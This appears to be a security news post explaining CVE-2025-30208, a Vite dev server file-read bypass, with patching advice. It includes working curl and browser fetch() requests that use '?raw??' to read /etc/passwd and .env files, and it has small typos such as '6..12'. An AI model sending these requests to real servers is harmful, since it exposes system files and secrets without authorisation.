CVE CyberSecurity Database News

CVE-2025-30208 - Critical Arbitrary File Read in Vite Dev Server – Simple Exploit, Simple Fix

Poster -

Vite is one of the most popular front-end development tools, powering thousands of modern React, Vue, and other JavaScript projects. But if you're working with an older version (before 6.2.3, 6.1.2, 6..12, 5.4.15, or 4.5.10), your app could be dangerously exposed to a serious file disclosure vulnerability: CVE-2025-30208.

This post breaks down how this issue works, how to exploit it, and most importantly, how to fix it. We'll keep the language simple and offer hands-on code details.

The Basics of the Vulnerability

When you run vite for local development, it fires up a dev server, serving files and transforming code quickly. To prevent exposure, Vite blocks outside access to files unless they're on an "allow list." It does this with a system called @fs, which restricts access by default.

What’s the bug?
If you tweak the URL just right, you can slip past these restrictions. By adding ?raw?? or ?import&raw?? to your file request URL, you *bypass* the allow list and get the raw content of any file, as long as you know the path and it exists.

Why Does This Happen?

The problem: Vite sanitizes URLs in several spots. It tries to remove extra URL pieces, like trailing question marks. But when crafting query strings, some regex checks overlook cases where there are trailing separators (like extra ?). That tiny miss lets hackers create requests that Vite’s blockers miss.

This mainly happens if you run Vite with vite --host or set server.host in your config.

- Local-only setups (localhost default) are not affected, unless you manually allow outside connections.

Exploitation: How Attackers Can Steal Files

Let’s look at how an attacker might abuse this bug.

Suppose an app exposes Vite dev server to the public. On most setups, requesting a sensitive file like /etc/passwd (Linux) or a config file outside the project root gets denied:

GET /@fs/etc/passwd   --> 403 Forbidden

But with the "bypass" trick, things change

GET /@fs/etc/passwd?raw??

or

GET /@fs/etc/passwd?import&raw??

Here’s a simple exploit with curl

# Replace HOST:PORT with the real Vite host/port
curl "http://HOST:PORT/@fs/etc/passwd?raw??";

Or, try reading a .env file outside the project

curl "http://HOST:PORT/@fs/../.env?raw??";

You’ll get plain text content, as if you had a shell on the server!

Let’s fetch a sensitive file from a browser console

fetch('http://HOST:PORT/@fs/etc/passwd?raw??';)
  .then(res => res.text())
  .then(console.log)

Mitigating the Hazard

Patch Immediately!

If you’re running any older version, upgrade now

npm install vite@latest
# or for a specific branch
npm install vite@6.2.3

Restrict Network Exposure:
If you have to use Vite on an older version (not recommended), never expose the dev server to the internet. Only run on localhost for development.

Official References

- Vite Security Advisory for CVE-2025-30208 *(actual advisory link may vary, check Vite’s GitHub Security Advisories for updates)*
- NIST NVD Entry for CVE-2025-30208
- Vite Changelog

CVE-2025-30208 lets anyone bypass Vite’s file access restrictions using a simple URL trick.

- Attackers can read basically any file on the server, as long as the dev server is exposed to the network.

Stay patched and smart. Don’t let simple dev oversights become critical production breaches.

*This exclusive post was written in plain language for developers and security researchers eager to understand and prevent CVE-2025-30208 in their projects.*

Timeline

Published on: 03/24/2025 17:15:21 UTC
Last modified on: 03/27/2025 16:45:46 UTC